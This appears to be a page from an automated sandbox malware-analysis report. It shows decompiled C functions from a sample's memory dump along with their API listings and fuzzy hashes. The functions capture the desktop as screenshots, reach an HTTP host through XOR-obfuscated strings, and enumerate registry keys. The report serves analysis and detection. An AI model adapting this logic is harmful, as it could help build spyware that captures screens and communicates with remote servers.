									__eflags =  *_t128 -  *((intOrPtr*)(_t104 + _t128));
									if( *_t128 !=  *((intOrPtr*)(_t104 + _t128))) {
										L26:
										_t129 = 0;
										__eflags = 0;
										_v188 = 0;
										goto L27;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									 *_t128 = 0xff;
									_t129 = _v188;
									 *((short*)(_t122 +  &(_t110->i))) = 0xc9ae;
									_t112 =  *0xb6ae58; // 0x0
									L27:
									_t110 =  &(_t110->i);
									_t51 = _t112 - 1; // -1
									__eflags = _t110 - _t51;
								} while (_t110 < _t51);
								__eflags = _t129;
								if(_t129 != 0) {
									goto L30;
								}
								_push(_t112);
								_push( *0xb6ae80);
								_push(_t118);
								goto L32;
							} else {
								goto L15;
							}
							do {
								L15:
								__eflags =  *((char*)(_t122 + _t87)) - 0xff;
								if( *((char*)(_t122 + _t87)) == 0xff) {
									__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xae;
									if( *((char*)(_t122 +  &(_t87->i))) == 0xae) {
										__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xc9;
										if( *((char*)(_t122 +  &(_t87->i))) == 0xc9) {
											 *((char*)(_t122 +  &(_t87->i))) = 0xaf;
											_t109 =  *0xb6ae58; // 0x0
										}
									}
								}
								_t87 =  &(_t87->i);
								__eflags = _t87 - _t109;
							} while (_t87 < _t109);
							goto L20;
						}
						__eflags =  *0xb6ae48 - _t126; // 0x0
						if(__eflags != 0) {
							goto L12;
						}
						__eflags =  *0xb6ae4c - _t101; // 0x0
						if(__eflags == 0) {
							goto L13;
						}
						goto L12;
					}
					__eflags = _t101 - _v36;
					if(_t101 == _v36) {
						goto L9;
					}
					goto L8;
				} else {
					_t119 = GetWindow;
					_push(1);
					_push(_t61);
					while(1) {
						_t123 = GetWindow();
						if(_t123 == 0 || E00B44383(_t100, _t119, _t123, _t123,  &_v56) == 0) {
							break;
						}
						_push(3);
						_push(_t123);
					}
					_t114 = _v60;
					_t121 = _v64;
					goto L6;
				}
			}

0x00b44426
0x00b44429
0x00b44430
0x00b44438
0x00b4443a
0x00b44448
0x00b44456
0x00b44459
0x00b44467
0x00b4446d
0x00b44472
0x00b4447a
0x00b4447e
0x00b44486
0x00b4448a
0x00b4448e
0x00b44496
0x00b444c5
0x00b444c5
0x00b444c9
0x00b444ce
0x00b444d2
0x00b444d7
0x00b444db
0x00b444e3
0x00b444f0
0x00b444f8
0x00b444fc
0x00b44505
0x00b44514
0x00b44525
0x00b4452f
0x00b44539
0x00b4453f
0x00b44543
0x00b4454a
0x00b4454e
0x00b44553
0x00b44558
0x00b4455a
0x00b4456c
0x00b4456d
0x00b44578
0x00b44583
0x00b44588
0x00b4458e
0x00b44593
0x00b44599
0x00b4459e
0x00b445a3
0x00b445a9
0x00b445ae
0x00b445b3
0x00b445b6
0x00b445bb
0x00b445c0
0x00b445c0
0x00b445c2
0x00b445c2
0x00b445d3
0x00b445d9
0x00b445df
0x00b445e6
0x00b445f1
0x00b445f8
0x00b445fe
0x00b44600
0x00b446c8
0x00b446ce
0x00b446d4
0x00b446da
0x00b446da
0x00b446df
0x00b446e2
0x00b446e4
0x00b446ec
0x00b446f6
0x00b446f6
0x00b44606
0x00b4460c
0x00b4460e
0x00b44614
0x00b44616
0x00b4463e
0x00b44646
0x00b4464b
0x00b44651
0x00b44654
0x00b4465c
0x00b4465e
0x00b44661
0x00b44663
0x00b446c3
0x00000000
0x00b446c5
0x00b44665
0x00b4466d
0x00b4466d
0x00b4466f
0x00b4466f
0x00b44675
0x00b44678
0x00b446a5
0x00b446a5
0x00b446a5
0x00b446a7
0x00000000
0x00b446a7
0x00b4467e
0x00b44682
0x00000000
0x00000000
0x00b44688
0x00b4468c
0x00000000
0x00000000
0x00b4468e
0x00b44692
0x00b44696
0x00b4469d
0x00b446ab
0x00b446ab
0x00b446ae
0x00b446b1
0x00b446b1
0x00b446b5
0x00b446b7
0x00000000
0x00000000
0x00b446b9
0x00b446ba
0x00b446c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00b44618
0x00b44618
0x00b44618
0x00b4461c
0x00b4461e
0x00b44623
0x00b44625
0x00b4462a
0x00b4462c
0x00b44631
0x00b44631
0x00b4462a
0x00b44623
0x00b44637
0x00b4463a
0x00b4463a
0x00000000
0x00b44618
0x00b4455c
0x00b44562
0x00000000
0x00000000
0x00b44564
0x00b4456a
0x00000000
0x00000000
0x00000000
0x00b4456a
0x00b444dd
0x00b444e1
0x00000000
0x00000000
0x00000000
0x00b44498
0x00b44498
0x00b4449e
0x00b444a0
0x00b444a1
0x00b444a3
0x00b444a7
0x00000000
0x00000000
0x00b444b8
0x00b444ba
0x00b444ba
0x00b444bd
0x00b444c1
0x00000000
0x00b444c1

APIs

GetDesktopWindow.USER32 ref: 00B4443C
GetWindowRect.USER32 ref: 00B44448
GetDC.USER32 ref: 00B44450
CreateCompatibleDC.GDI32(00000000), ref: 00B4445D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B44472
SelectObject.GDI32(00000000,00000000), ref: 00B4447E
GetTopWindow.USER32(00000000), ref: 00B4448E
GetWindow.USER32(00000000,00000001), ref: 00B444A1

Part of subcall function 00B44383: IsWindowVisible.USER32 ref: 00B4439F
Part of subcall function 00B44383: GetWindowLongA.USER32 ref: 00B443B9
Part of subcall function 00B44383: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00B443C3
Part of subcall function 00B44383: GetVersionExA.KERNEL32(00000094), ref: 00B443F0
Part of subcall function 00B44383: GetTopWindow.USER32(?), ref: 00B44400

CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B444E6
CreateCompatibleDC.GDI32(?), ref: 00B444F2
SelectObject.GDI32(00000000,00000000), ref: 00B444FC
SetStretchBltMode.GDI32(00000000,00000004), ref: 00B44505
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00B44525
DeleteObject.GDI32(?), ref: 00B4452F
DeleteDC.GDI32(?), ref: 00B44539
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00B6AE44,00000000), ref: 00B445DF
DeleteObject.GDI32(?), ref: 00B445E6
ReleaseDC.USER32 ref: 00B445F1
DeleteDC.GDI32(00000000), ref: 00B445F8

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteObject$BitmapLongSelectStretch$BitsDesktopModeRectReleaseVersionVisible
String ID:
API String ID: 2588145-0
Opcode ID: 699eac2f66b439facfb78562b8959d0f7e72b801e458b909f82ed472e02bbdcf
Instruction ID: 36b7829db5f257c0ea0d1426ed27905035e1138ff2e28f83043603bc44ec1b79
Opcode Fuzzy Hash: 699eac2f66b439facfb78562b8959d0f7e72b801e458b909f82ed472e02bbdcf
Instruction Fuzzy Hash: 2581D372118340AFCB119F24EC44A2ABBE9FF85714B140599F540931A1DFBADA15EF62

Uniqueness

Uniqueness Score: -1.00%

Function 00B487BF, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 169
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B487BF(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp) {
				signed int _v4;
				char _v26;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v52;
				char _v76;
				char _v80;
				void* _v92;
				char _v113;
				char _v116;
				void* _v120;
				void* _v124;
				long _v140;
				void _v152;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _t52;
				void* _t61;
				char* _t64;
				intOrPtr _t76;
				intOrPtr _t77;
				signed int _t82;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t91;
				char _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t104;
				signed int _t107;

				_t52 =  *0xb69014; // 0x26ce9e99
				_v4 = _t52 ^ _t107;
				_t104 = __ecx;
				_t82 = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t101 = InternetOpenA(0, 0, 0, 0, 0);
				_v52 = _t101;
				if(_t101 != 0) {
					_v40 = 0x21362e22;
					_v36 = 0x693c3c2b;
					_v32 = 0x22262727;
					_v28 = 0x2822;
					_v26 = 0;
					_t61 = InternetConnectA(_t101, E00B427F5( &_v40), 0x50, 0, 0, 3, 0, 0);
					_v92 = _t61;
					if(_t61 != 0) {
						_t96 = 0;
						if( *__ecx == 0) {
							_v116 = 0x160407;
							_t88 = 0;
							do {
								_t15 = _t88 + 0x40; // 0x40
								 *(_t107 + _t88 + 0x10) =  *(_t107 + _t88 + 0x10) ^ _t15;
								_t88 = _t88 + 1;
							} while (_t88 < 3);
							_v113 = 0;
							_t64 =  &_v116;
						} else {
							_v80 = 0x17110e10;
							_v76 = 0;
							_t64 = E00B432BE( &_v80);
							_t96 = 0;
						}
						_t22 = _t104 + 0xc; // 0x0
						_t102 = HttpOpenRequestA(_v92, _t64,  *_t22, _t96, _t96, _t96, 0x84680100, _t96);
						if(_t102 != 0) {
							_t24 = _t104 + 0x14; // 0x0
							_t25 = _t104 + 0x10; // 0x0
							if(HttpSendRequestA(_t102, 0, 0,  *_t25,  *_t24) != 0) {
								_v152 = _v152 & _t82;
								_v140 = 4;
								HttpQueryInfoA(_t102, 0x20000013,  &_v152,  &_v140, 0);
								if(_v172 == 0xc8) {
									_push(0x400a);
									_t83 = E00B509A2();
									_v184 = 0x400a;
									_v180 = 0;
									if(_t83 == 0) {
										_t82 = 0;
									} else {
										_v176 = 1;
										_push( &_v168);
										_push(0x400a);
										_push(_t83);
										while(InternetReadFile(_t102, ??, ??, ??) != 0) {
											_t98 = _v184;
											_t76 = _v196;
											if(_t98 == 0) {
												 *((char*)(_t76 + _t83)) = 0;
												 *((intOrPtr*)(_t104 + 0x18)) = _t83;
												_t82 = _v192;
												 *((intOrPtr*)(_t104 + 0x1c)) = _t76;
											} else {
												_t77 = _t76 + _t98;
												_t91 = _v200 - _t98;
												_v196 = _t77;
												_v200 = _t91;
												if(_t91 != 0) {
													L16:
													_push( &_v184);
													_push(_t91);
													_push(_t77 + _t83);
													continue;
												} else {
													_v200 = 0x400a;
													_push(_t77 + 0x400a);
													_push(_t83);
													_t83 = E00B5294D();
													if(_t83 == 0) {
														break;
													} else {
														_t77 = _v196;
														_t91 = _v200;
														goto L16;
													}
												}
											}
											goto L21;
										}
										_t82 = 0;
									}
								}
							}
							L21:
							InternetCloseHandle(_t102);
						}
						InternetCloseHandle(_v124);
						_t101 = _v120;
					}
					InternetCloseHandle(_t101);
				}
				InternetCloseHandle(_t101);
				return E00B4AE43(_v28 ^ _t107);
			}

0x00b487c2
0x00b487c9
0x00b487d2
0x00b487da
0x00b487dc
0x00b487eb
0x00b487ed
0x00b487f3
0x00b487fb
0x00b4880f
0x00b48817
0x00b4881f
0x00b48826
0x00b48831
0x00b48837
0x00b4883d
0x00b48843
0x00b48847
0x00b48862
0x00b4886a
0x00b4886c
0x00b4886c
0x00b4886f
0x00b48873
0x00b48874
0x00b48879
0x00b4887d
0x00b48849
0x00b4884d
0x00b48855
0x00b48859
0x00b4885e
0x00b4885e
0x00b4888a
0x00b48898
0x00b4889c
0x00b488a2
0x00b488a5
0x00b488b5
0x00b488bb
0x00b488ca
0x00b488d9
0x00b488e7
0x00b488ed
0x00b488f7
0x00b48900
0x00b48904
0x00b4890b
0x00b48988
0x00b4890d
0x00b48911
0x00b48919
0x00b4891a
0x00b4891b
0x00b48969
0x00b4891e
0x00b48922
0x00b48928
0x00b48978
0x00b4897c
0x00b4897f
0x00b48983
0x00b4892a
0x00b4892e
0x00b48930
0x00b48932
0x00b48936
0x00b4893c
0x00b48960
0x00b48966
0x00b48967
0x00b48968
0x00000000
0x00b4893e
0x00b48945
0x00b48949
0x00b4894a
0x00b48950
0x00b48956
0x00000000
0x00b48958
0x00b48958
0x00b4895c
0x00000000
0x00b4895c
0x00b48956
0x00b4893c
0x00000000
0x00b48928
0x00b48974
0x00b48974
0x00b4890b
0x00b488e7
0x00b4898a
0x00b4898b
0x00b4898b
0x00b48991
0x00b48993
0x00b48993
0x00b48998
0x00b48998
0x00b4899b
0x00b489b1

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B487DF
InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00B48831
HttpOpenRequestA.WININET(?,00160407,00000000,00000000,00000000,00000000,84680100,00000000), ref: 00B48892
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B488AD
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00B488D9
InternetReadFile.WININET(00000000,00000000,0000400A,?), ref: 00B4896A
InternetCloseHandle.WININET(00000000), ref: 00B4898B
InternetCloseHandle.WININET(?), ref: 00B48991
InternetCloseHandle.WININET(00000000), ref: 00B48998
InternetCloseHandle.WININET(00000000), ref: 00B4899B

Strings

".6!, xrefs: 00B487FB
+<<i, xrefs: 00B4880F
"(, xrefs: 00B4881F
''&", xrefs: 00B48817

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Http$OpenRequest$ConnectFileInfoQueryReadSend
String ID: "($".6!$''&"$+<<i
API String ID: 379955058-275990164
Opcode ID: f05815e9da205d151859dff7c14139af889fee4f0637fa13965ee95b9a45deb9
Instruction ID: fc02c2f10aca86be7bbf6c702c170cdb72cda605eed35b4d55aad03e7ae1a498
Opcode Fuzzy Hash: f05815e9da205d151859dff7c14139af889fee4f0637fa13965ee95b9a45deb9
Instruction Fuzzy Hash: 8A519CB1208302AFE714CF25DC80A3FBBE9EBD9704F04496DF58196251EB70DA099B63

Uniqueness

Uniqueness Score: -1.00%

Function 00B42966, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B42966(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				char* _t53;
				char _t56;
				void* _t58;
				long _t60;
				intOrPtr _t65;
				short _t66;
				char _t67;
				void _t68;
				void _t72;
				void _t73;
				void* _t76;
				void* _t77;
				long _t79;
				char* _t88;
				int _t91;
				intOrPtr* _t92;
				signed int _t97;
				void* _t102;
				signed int _t104;
				void* _t112;
				void* _t113;
				signed int _t114;
				short* _t118;
				void* _t119;
				void* _t124;
				void* _t133;
				void* _t134;
				char* _t137;
				signed int _t138;
				signed int _t140;
				void* _t141;
				void* _t142;

				_t50 =  *0xb69014; // 0x26ce9e99
				 *(_t140 + 0x3c) = _t50 ^ _t140;
				_push(0x208);
				 *((intOrPtr*)(_t140 + 0x18)) =  *((intOrPtr*)(_t140 + 0x44));
				_t53 = E00B509A2();
				asm("movaps xmm0, [0xb3dd20]");
				_t88 = _t53;
				asm("movups [esp+0x28], xmm0");
				asm("movaps xmm0, [0xb3dc60]");
				_t91 = 0;
				asm("movups [esp+0x34], xmm0");
				 *((char*)(_t140 + 0x44)) = 0;
				do {
					_t5 = _t91 + 0x40; // 0x40
					 *(_t140 + _t91 + 0x24) =  *(_t140 + _t91 + 0x24) ^ _t5;
					_t91 = _t91 + 1;
				} while (_t91 < 0x20);
				_t92 = _t140 + 0x24;
				 *((char*)(_t140 + 0x44)) = 0;
				_t112 = _t88 - _t92;
				do {
					_t56 =  *_t92;
					 *((char*)(_t112 + _t92)) = _t56;
					_t92 = _t92 + 1;
				} while (_t56 != 0);
				 *(_t140 + 0x1c) = 0;
				_t58 = GetCurrentProcess();
				__imp__IsWow64Process(_t58, _t140 + 0x18);
				if(_t58 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
					_t60 = RegOpenKeyA(0x80000002, _t88, _t140 + 0xc);
				} else {
					_t60 = RegOpenKeyExA(0x80000002, _t88, 0, 0x109, _t140 + 0xc);
				}
				if(_t60 == 0) {
					_push(0x104);
					_t137 = E00B509A2();
					RegEnumKeyA( *(_t140 + 0x1c), 0, _t137, 0x104);
					_t19 = _t88 - 1; // -1
					_t118 = _t19;
					do {
						_t65 =  *((intOrPtr*)(_t118 + 1));
						_t118 = _t118 + 1;
					} while (_t65 != 0);
					_t66 =  *0xb3d854; // 0x5c
					_t133 = _t137;
					 *_t118 = _t66;
					do {
						_t67 =  *_t137;
						_t137 =  &(_t137[1]);
					} while (_t67 != 0);
					_t138 = _t137 - _t133;
					_t21 = _t88 - 1; // -1
					_t119 = _t21;
					do {
						_t68 =  *(_t119 + 1);
						_t119 = _t119 + 1;
					} while (_t68 != 0);
					 *(_t140 + 0x1c) = 0x2a230c1c;
					_t97 = _t138 >> 2;
					memcpy(_t119, _t133, _t97 << 2);
					_t141 = _t140 + 0xc;
					 *((short*)(_t141 + 0x20)) = 0x2a;
					memcpy(_t133 + _t97 + _t97, _t133, _t138 & 0x00000003);
					_t142 = _t141 + 0xc;
					_t102 = 0;
					do {
						_t26 = _t102 + 0x40; // 0x40
						 *(_t142 + _t102 + 0x18) =  *(_t142 + _t102 + 0x18) ^ _t26;
						_t102 = _t102 + 1;
					} while (_t102 < 5);
					_t113 = _t142 + 0x18;
					 *((char*)(_t142 + 0x1d)) = 0;
					_t134 = _t113;
					do {
						_t72 =  *_t113;
						_t113 = _t113 + 1;
					} while (_t72 != 0);
					_t114 = _t113 - _t134;
					_t33 = _t88 - 1; // -1
					_t124 = _t33;
					do {
						_t73 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t73 != 0);
					_t104 = _t114 >> 2;
					memcpy(_t124, _t134, _t104 << 2);
					_t76 = memcpy(_t134 + _t104 + _t104, _t134, _t114 & 0x00000003);
					_t140 = _t142 + 0x18;
					 *(_t140 + 0x1c) = 0;
					_t77 = GetCurrentProcess();
					__imp__IsWow64Process(_t77, _t76);
					if(_t77 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
						_t79 = RegOpenKeyA(0x80000002, _t88, _t140 + 0x10);
					} else {
						_t79 = RegOpenKeyExA(0x80000002, _t88, 0, 0x101, _t140 + 0x10);
					}
					if(_t79 != 0) {
						goto L27;
					} else {
						_push(0);
						 *((intOrPtr*)(_t140 + 0x20)) = 0x2b362010;
						 *((intOrPtr*)(_t140 + 0x24)) = 0x3f032a10;
						 *((short*)(_t140 + 0x28)) = 0x2d;
						E00B42CCF(_t140 + 0x20,  *(_t140 + 0x1c), E00B42D10(_t140 + 0x20),  *((intOrPtr*)(_t140 + 0x18)));
						RegCloseKey( *(_t140 + 0xc));
						RegCloseKey( *(_t140 + 0x10));
						E00B50985(_t88);
					}
				}
				return E00B4AE43( *(_t140 + 0x48) ^ _t140);
			}

0x00b42969
0x00b42970
0x00b4297b
0x00b42980
0x00b42984
0x00b42989
0x00b42990
0x00b42992
0x00b42998
0x00b4299f
0x00b429a1
0x00b429a6
0x00b429ab
0x00b429ab
0x00b429ae
0x00b429b2
0x00b429b3
0x00b429b8
0x00b429bc
0x00b429c5
0x00b429c7
0x00b429c7
0x00b429c9
0x00b429cc
0x00b429cd
0x00b429d8
0x00b429dc
0x00b429e3
0x00b429eb
0x00b42a17
0x00b429f3
0x00b42a04
0x00b42a04
0x00b42a1f
0x00b42a2b
0x00b42a33
0x00b42a3b
0x00b42a41
0x00b42a41
0x00b42a44
0x00b42a44
0x00b42a47
0x00b42a48
0x00b42a4c
0x00b42a52
0x00b42a54
0x00b42a57
0x00b42a57
0x00b42a5a
0x00b42a5b
0x00b42a5f
0x00b42a61
0x00b42a61
0x00b42a64
0x00b42a64
0x00b42a67
0x00b42a68
0x00b42a6e
0x00b42a76
0x00b42a79
0x00b42a79
0x00b42a7d
0x00b42a87
0x00b42a87
0x00b42a89
0x00b42a8c
0x00b42a8c
0x00b42a8f
0x00b42a93
0x00b42a94
0x00b42a99
0x00b42a9d
0x00b42aa2
0x00b42aa4
0x00b42aa4
0x00b42aa6
0x00b42aa7
0x00b42aab
0x00b42aad
0x00b42aad
0x00b42ab0
0x00b42ab0
0x00b42ab3
0x00b42ab4
0x00b42abe
0x00b42ac1
0x00b42ac8
0x00b42ac8
0x00b42acd
0x00b42ad1
0x00b42ad8
0x00b42ae0
0x00b42b0c
0x00b42ae8
0x00b42af9
0x00b42af9
0x00b42b14
0x00000000
0x00b42b16
0x00b42b16
0x00b42b1f
0x00b42b27
0x00b42b2f
0x00b42b40
0x00b42b4f
0x00b42b55
0x00b42b58
0x00b42b5d
0x00b42b14
0x00b42b73

APIs

GetCurrentProcess.KERNEL32(?), ref: 00B429DC
IsWow64Process.KERNEL32(00000000), ref: 00B429E3
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000109,00000000), ref: 00B42A04
RegOpenKeyA.ADVAPI32(80000002,00000000,00000000), ref: 00B42A17
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00B42A3B
GetCurrentProcess.KERNEL32(?), ref: 00B42AD1
IsWow64Process.KERNEL32(00000000), ref: 00B42AD8
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000101,?), ref: 00B42AF9
RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00B42B0C
RegCloseKey.ADVAPI32(00000000,2A230C1C,00000000,?), ref: 00B42B4F
RegCloseKey.ADVAPI32(?), ref: 00B42B55

Strings

*, xrefs: 00B42A7D
-, xrefs: 00B42B2F

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64$Enum
String ID: *$-
API String ID: 1684924610-2125244407
Opcode ID: e797b501d35bef3de73964bbdf1746b8faa27b2a6297b66cf6a6460b83bfe7d3
Instruction ID: 508dfdbee0269bc3440d39a4231d607275d59c7a55bb8b1605e9393ac0a5355d
Opcode Fuzzy Hash: e797b501d35bef3de73964bbdf1746b8faa27b2a6297b66cf6a6460b83bfe7d3
Instruction Fuzzy Hash: 635134704083459FDB15CF29DC44A6BBBE8FF99344F40059DF8C193252EB319A49EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B55707, Relevance: 22.8, APIs: 15, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B55707(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr* _v48;
				char* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				char _v92;
				signed int _t118;
				char _t140;
				signed short _t143;
				signed int _t144;
				void* _t147;
				void* _t150;
				void* _t153;
				void* _t154;
				void* _t157;
				signed int _t159;
				intOrPtr* _t160;
				signed char _t177;
				signed int* _t180;
				char* _t183;
				signed char _t184;
				void* _t191;
				char _t193;
				void* _t195;
				signed int* _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				short* _t206;
				intOrPtr _t207;
				signed int _t208;
				signed char _t215;
				char _t216;
				intOrPtr _t217;
				void* _t220;
				signed int _t221;
				signed char* _t223;
				int* _t225;
				signed char* _t237;
				short* _t238;
				intOrPtr* _t240;
				char* _t241;
				char* _t242;
				intOrPtr* _t246;
				signed int _t247;
				short* _t248;
				void* _t250;
				signed int _t251;
				signed int _t252;
				void* _t253;
				void* _t254;

				_t118 =  *0xb69014; // 0x26ce9e99
				_v8 = _t118 ^ _t252;
				_t240 = _a4;
				_t193 = 0;
				_v56 = _t240;
				_v32 = 0;
				_v36 = 0;
				_t120 =  *((intOrPtr*)(_t240 + 0xa8));
				_v40 = 0;
				_v44 = 0;
				_v92 = _t240;
				_v88 = 0;
				if( *((intOrPtr*)(_t240 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t240 + 0x8c));
					if( *((intOrPtr*)(_t240 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t240 + 0x8c)) = _t193;
					__eflags = 0;
					 *((intOrPtr*)(_t240 + 0x90)) = _t193;
					 *_t240 = 0xb34fd8;
					 *((intOrPtr*)(_t240 + 0x94)) = 0xb35258;
					 *((intOrPtr*)(_t240 + 0x98)) = 0xb353d8;
					 *((intOrPtr*)(_t240 + 4)) = 1;
					L48:
					return E00B4AE43(_v8 ^ _t252);
				}
				_push(__edi);
				_t225 = _t240 + 8;
				_v48 = 0;
				if( *_t225 != 0) {
					L3:
					_v48 = E00B598AF(1, 4);
					E00B564B8(_t193);
					_v32 = E00B598AF(0x180, 2);
					E00B564B8(_t193);
					_v36 = E00B598AF(0x180, 1);
					E00B564B8(_t193);
					_v40 = E00B598AF(0x180, 1);
					E00B564B8(_t193);
					_v44 = E00B598AF(0x101, 1);
					E00B564B8(_t193);
					_t254 = _t253 + 0x3c;
					if(_v48 == _t193 || _v32 == _t193) {
						L43:
						E00B564B8(_v48);
						E00B564B8(_v32);
						E00B564B8(_v36);
						E00B564B8(_v40);
						_t193 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t202 = _v44;
						if(_t202 == 0 || _v36 == _t193 || _v40 == _t193) {
							goto L43;
						} else {
							_t140 = _t193;
							do {
								 *((char*)(_t140 + _t202)) = _t140;
								_t140 = _t140 + 1;
							} while (_t140 < 0x100);
							if(GetCPInfo( *_t225,  &_v28) == 0) {
								goto L43;
							}
							_t143 = _v28;
							if(_t143 > 5) {
								goto L43;
							}
							_t144 = _t143 & 0x0000ffff;
							_v60 = _t144;
							if(_t144 <= 1) {
								L22:
								_v52 = _v44 + 1;
								_t147 = E00B59335(_t193, _t225, _t240, _t272, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x100, _v44 + 1, 0xff, _v36 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t273 = _t147;
								if(_t147 == 0) {
									goto L43;
								}
								_t150 = E00B59335(_t193, _t225, _t240, _t273, _t193,  *((intOrPtr*)(_t240 + 0xa8)), 0x200, _v52, 0xff, _v40 + 0x81, 0xff,  *_t225, _t193);
								_t254 = _t254 + 0x24;
								_t274 = _t150;
								if(_t150 == 0) {
									goto L43;
								}
								_v76 = _v32 + 0x100;
								_t153 = E00B5BFC9(_t193, _t225, _t240, _t274, _t193, 1, _v44, 0x100, _v32 + 0x100,  *_t225, _t193);
								_t254 = _t254 + 0x1c;
								if(_t153 == 0) {
									goto L43;
								}
								_t154 = _v32;
								_t206 = _t154 + 0xfe;
								 *_t206 = 0;
								_t220 = _v40;
								_v80 = _t206;
								_t207 = _v36;
								_t241 = _t207 + 0x80;
								 *((char*)(_t207 + 0x7f)) = _t193;
								 *((char*)(_t220 + 0x7f)) = _t193;
								 *_t241 = _t193;
								_v84 = _t241;
								_t242 = _t220 + 0x80;
								_v52 = _t242;
								 *_t242 = _t193;
								if(_v60 <= 1) {
									L39:
									_t208 = 0x3f;
									_push(0x1f);
									_t157 = memcpy(_v32, _v32 + 0x200, _t208 << 2);
									_push(0x1f);
									asm("movsw");
									memcpy(_t157, _t157 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t159 = memcpy(_t220, _t220 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t246 = _v56;
									if( *((intOrPtr*)(_t246 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t159 | 0xffffffff) == 0) {
											E00B564B8( *((intOrPtr*)(_t246 + 0x90)) - 0xfe);
											E00B564B8( *((intOrPtr*)(_t246 + 0x94)) - 0x80);
											E00B564B8( *((intOrPtr*)(_t246 + 0x98)) - 0x80);
											E00B564B8( *((intOrPtr*)(_t246 + 0x8c)));
										}
									}
									_t160 = _v48;
									 *_t160 = 1;
									 *((intOrPtr*)(_t246 + 0x8c)) = _t160;
									 *_t246 = _v76;
									 *((intOrPtr*)(_t246 + 0x90)) = _v80;
									 *((intOrPtr*)(_t246 + 0x94)) = _v84;
									 *((intOrPtr*)(_t246 + 0x98)) = _v52;
									 *(_t246 + 4) = _v60;
									L44:
									E00B564B8(_v44);
									goto L48;
								}
								if( *_t225 != 0xfde9) {
